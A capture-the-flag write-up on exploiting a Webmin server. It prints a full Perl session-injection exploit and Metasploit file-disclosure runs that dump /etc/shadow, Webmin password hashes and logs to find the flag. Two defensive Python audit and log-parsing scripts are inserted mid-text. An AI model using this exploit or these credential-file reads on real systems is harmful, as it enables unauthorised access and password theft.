NCL Exploit 2: Webmin Writeup

This one was fun. The challenge was titled Exploit 2, with the task of finding the flag on the system. A quick nmap scan with service detection showed a Webmin console running on port 10000. I tried searching for a default Webmin login password, but Webmin authenticates against the system's shadow file. I decided to look into Webmin vulns next. A quick Google search uncovered a remote command execution vuln! Hallelujah! I found the following exploit code.

#!/usr/bin/perl
#
# Exploit for Webmin 1.050 - 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt \n\n";

$nc="/usr/bin/nc";

if($#ARGV == -1) {
    print "Syntax:\n\t$0 hostname\n";
    exit(1);
}

$hostname=$ARGV[0];

if ( ! -x $nc ) {
    print "netcat not found!\n";
    exit(2);
}

open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";

Escalating to admin looked promising. Unfortunately, the exploit didn't seem to work when I plugged the cookie values into Firefox, so I kept looking and found a Metasploit module for file disclosure: auxiliary/admin/webmin/file_disclosure

msf auxiliary(file_disclosure) > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting    Required  Description
   ----     ---------------    --------  -----------
   DIR      /unauthenticated   yes       Webmin directory path
   Proxies                     no        Use a proxy chain
   RHOST    54.221.*.*         yes       The target address
   RPATH    /etc/passwd        yes       The file to download
   RPORT    10000              yes       The target port
   VHOST                       no        HTTP server virtual host

Let's try it out...

msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
...
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
[*] Auxiliary module execution completed

HELL YES. But just to make sure we can get to ANY file...

msf auxiliary(file_disclosure) > set RPATH /etc/shadow
RPATH => /etc/shadow
msf auxiliary(file_disclosure) > exploit

Sure enough, the whole shadow file was dumped. There was one user with a hash: ubuntu. Taking that as an attack vector, I started cracking it. SSH was also open on the machine, but unfortunately it only accepted key-based logins (authorized_keys). I stopped the crack, saved the hash for later, and continued my search for the flag. The problem here is that directories cannot be listed, so we need to know which files to look in. I thought that maybe they had left their SSH keys lying around, so I looked in /home/ubuntu/.ssh/ for id_rsa and id_dsa, but no such luck. I searched around the internet for important Webmin files and found /etc/webmin/miniserv.conf. In this file was the location of a users file...

session=1
userfile=/etc/webmin/miniserv.users
keyfile=/etc/webmin/miniserv.pem
passwd_file=/etc/shadow
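The miniserv.conf excerpt above is what made the next pivot possible: it points straight at the file holding Webmin's own password hashes. The following audit script is an added example, not code from the writeup or from Webmin. It parses the key=value format shown above, resolves userfile, keyfile and passwd_file, and reports any that is missing or readable by users other than its owner. The root parameter, the sample config and the staged files are assumptions for this example so that it runs offline against a temporary directory rather than a live /etc/webmin.

```python
"""Audit a Webmin miniserv.conf for credential files that are exposed on disk.

Added example (not the writeup's or Webmin's code). Assumes the key=value
layout seen in the writeup's excerpt; everything else here is constructed.
"""
import os
import stat
import tempfile

# Keys from the writeup's excerpt that point at sensitive files.
SENSITIVE_KEYS = ("userfile", "keyfile", "passwd_file")


def parse_miniserv_conf(text):
    """Parse key=value lines; blank lines, comments and malformed lines are skipped."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit(conf, root="/"):
    """Return a list of findings as strings.

    `root` (an assumption for this example) re-bases absolute paths so the
    check can run against a staged directory tree instead of the real system.
    """
    findings = []
    for key in SENSITIVE_KEYS:
        path = conf.get(key)
        if not path:
            findings.append(f"{key}: not set")
            continue
        real = os.path.join(root, path.lstrip("/"))
        try:
            mode = os.stat(real).st_mode
        except FileNotFoundError:
            findings.append(f"{key}: {path} does not exist")
            continue
        # Hashes and the TLS private key should never be world-readable.
        if mode & stat.S_IROTH:
            findings.append(
                f"{key}: {path} is world-readable (mode {stat.S_IMODE(mode):04o})"
            )
    return findings


# Constructed sample config, modelled on the writeup's excerpt.
SAMPLE_CONF = """\
session=1
userfile=/etc/webmin/miniserv.users
keyfile=/etc/webmin/miniserv.pem
passwd_file=/etc/shadow
"""


def stage_sample(root):
    """Create the referenced files under root with deliberately mixed permissions."""
    layout = {
        "etc/webmin/miniserv.users": 0o644,  # constructed weakness: world-readable hashes
        "etc/webmin/miniserv.pem": 0o600,
        "etc/shadow": 0o640,                 # typical root:shadow layout
    }
    for rel, mode in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(full, mode)


def run_demo():
    """Stage the sample tree, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        stage_sample(root)
        return audit(parse_miniserv_conf(SAMPLE_CONF), root=root)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

On a real host you would call audit(parse_miniserv_conf(open("/etc/webmin/miniserv.conf").read())) with the default root. The check deliberately ignores group-readability, since /etc/shadow is normally readable by the shadow group; anything world-readable is the condition worth alerting on.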

Looking in the users file gave me back a user named 'admin' and a corresponding hash! I started cracking again. In the meantime I wanted to find out more information about the Webmin install. I ran across the path to a logfile: /var/webmin/webmin.log. So I ran the module:

msf auxiliary(file_disclosure) > set RPATH /var/webmin/webmin.log
RPATH => /var/webmin/webmin.log
msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /var/webmin/webmin.log...
[*] The server returned: 200 Document follows
1412056349.16448.0 [30/Sep/2014 05:52:29] admin 48ce0c8821c3b8e1bb0d4e1da9f6bfb3 69.243.41.246 shell index.cgi "run" "-" "-" cmd='ls'
1412056361.16443.0 [30/Sep/2014 05:52:41] admin 48ce0c8821c3b8e1bb0d4e1da9f6bfb3 69.243.41.246 shell index.cgi "run" "-" "-" cmd='echo ls'
...
1412058045.17086.0 [30/Sep/2014 06:20:45] admin bd3bb672780ccf9c85e4c31761e54e0c 96.244.40.9 shell index.cgi "run" "-" "-" cmd='cat flag.php'
1412058064.17085.0 [30/Sep/2014 06:21:04] admin bd3bb672780ccf9c85e4c31761e54e0c 96.244.40.9 shell index.cgi "run" "-" "-" cmd='find / -name flag.php'
1412058074.17133.0 [30/Sep/2014 06:21:14] admin bd3bb672780ccf9c85e4c31761e54e0c 96.244.40.9 shell index.cgi "run" "-" "-" cmd='cat /var/www/flag.php'
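The log above is worth a second look from the defender's side: every command run through the Webmin shell module is recorded with the user, the session id and the client address, which is exactly what an incident responder wants, and also why disclosure of this file is a problem in itself. The parser below is an added example, not code from the writeup or from Webmin. It reads the line format seen above (id, bracketed date, user, sid, client IP, module, script, three quoted fields, then key='value' parameters), lists the commands executed through the shell module, and flags any session id that was used from more than one client address. The sample lines are constructed, adapted from the excerpt with the client addresses replaced by documentation ranges; the helper and field names are assumptions of this example.

```python
"""Parse Webmin's webmin.log action log and pull out shell-module command runs.

Added example (not the writeup's or Webmin's code). Line layout follows the
excerpt in the writeup; the sample lines below are constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# <id> [<date>] <user> <sid> <ip> <module> <script> "<action>" "<type>" "<object>" key='value' ...
LINE_RE = re.compile(
    r'^(?P<id>\S+) \[(?P<date>[^\]]+)\] (?P<user>\S+) (?P<sid>\S+) (?P<ip>\S+) '
    r'(?P<module>\S+) (?P<script>\S+) "(?P<action>[^"]*)" "(?P<type>[^"]*)" '
    r'"(?P<obj>[^"]*)"(?P<rest>.*)$'
)
# Trailing parameters; values containing a single quote are not handled here.
PARAM_RE = re.compile(r"(\w+)='([^']*)'")


@dataclass
class Entry:
    user: str
    sid: str
    ip: str
    module: str
    script: str
    action: str
    params: dict = field(default_factory=dict)


def parse_line(line):
    """Return an Entry for a well-formed log line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    params = dict(PARAM_RE.findall(m.group("rest")))
    return Entry(m.group("user"), m.group("sid"), m.group("ip"), m.group("module"),
                 m.group("script"), m.group("action"), params)


def shell_commands(lines):
    """(user, client ip, command) for every command executed via the shell module."""
    out = []
    for line in lines:
        e = parse_line(line)
        if e is not None and e.module == "shell" and "cmd" in e.params:
            out.append((e.user, e.ip, e.params["cmd"]))
    return out


def shared_sessions(lines):
    """Session ids seen from more than one client address -> set of addresses.

    A sid reused from a second address is a simple indicator that a session
    may have been stolen or injected rather than established by one login.
    """
    seen = defaultdict(set)
    for line in lines:
        e = parse_line(line)
        if e is not None:
            seen[e.sid].add(e.ip)
    return {sid: ips for sid, ips in seen.items() if len(ips) > 1}


# Constructed sample log (client addresses from RFC 5737 documentation ranges).
SAMPLE_LOG = """\
1412056349.16448.0 [30/Sep/2014 05:52:29] admin 48ce0c8821c3b8e1bb0d4e1da9f6bfb3 203.0.113.5 shell index.cgi "run" "-" "-" cmd='ls'
1412056361.16443.0 [30/Sep/2014 05:52:41] admin 48ce0c8821c3b8e1bb0d4e1da9f6bfb3 203.0.113.5 shell index.cgi "run" "-" "-" cmd='echo ls'
1412056400.16450.0 [30/Sep/2014 05:53:20] admin 48ce0c8821c3b8e1bb0d4e1da9f6bfb3 198.51.100.7 shell index.cgi "run" "-" "-" cmd='id'
1412058045.17086.0 [30/Sep/2014 06:20:45] admin bd3bb672780ccf9c85e4c31761e54e0c 198.51.100.7 shell index.cgi "run" "-" "-" cmd='cat flag.php'
1412058100.17140.0 [30/Sep/2014 06:21:40] admin bd3bb672780ccf9c85e4c31761e54e0c 198.51.100.7 useradmin save_user.cgi "modify" "user" "bob" uid='1001'
"""


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for user, ip, cmd in shell_commands(lines):
        print(f"{user}@{ip} ran: {cmd}")
    for sid, ips in shared_sessions(lines).items():
        print(f"session {sid} used from {sorted(ips)}")
```

Feed it the real file with shell_commands(open("/var/webmin/webmin.log").readlines()). Because session ids are written to this log in the clear, anyone who can read it can see which sessions were live; keeping the file readable only by root is the obvious control, and the file disclosure used in this writeup is the reason it matters.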

YES! Someone has already run cat /var/www/flag.php, so that's where the flag lives. Now to look in that file...

msf auxiliary(file_disclosure) > set RPATH /var/www/flag.php
RPATH => /var/www/flag.php
msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /var/www/flag.php...
[*] The server returned: 200 Document follows
<? // THIS IS THE RRAL FLAG FOR THIS SYSTEM: NCL-OSSL-1337 FLAG FLAG FLAG ?>;
[*] Auxiliary module execution completed

Got it, NCL-OSSL-1337.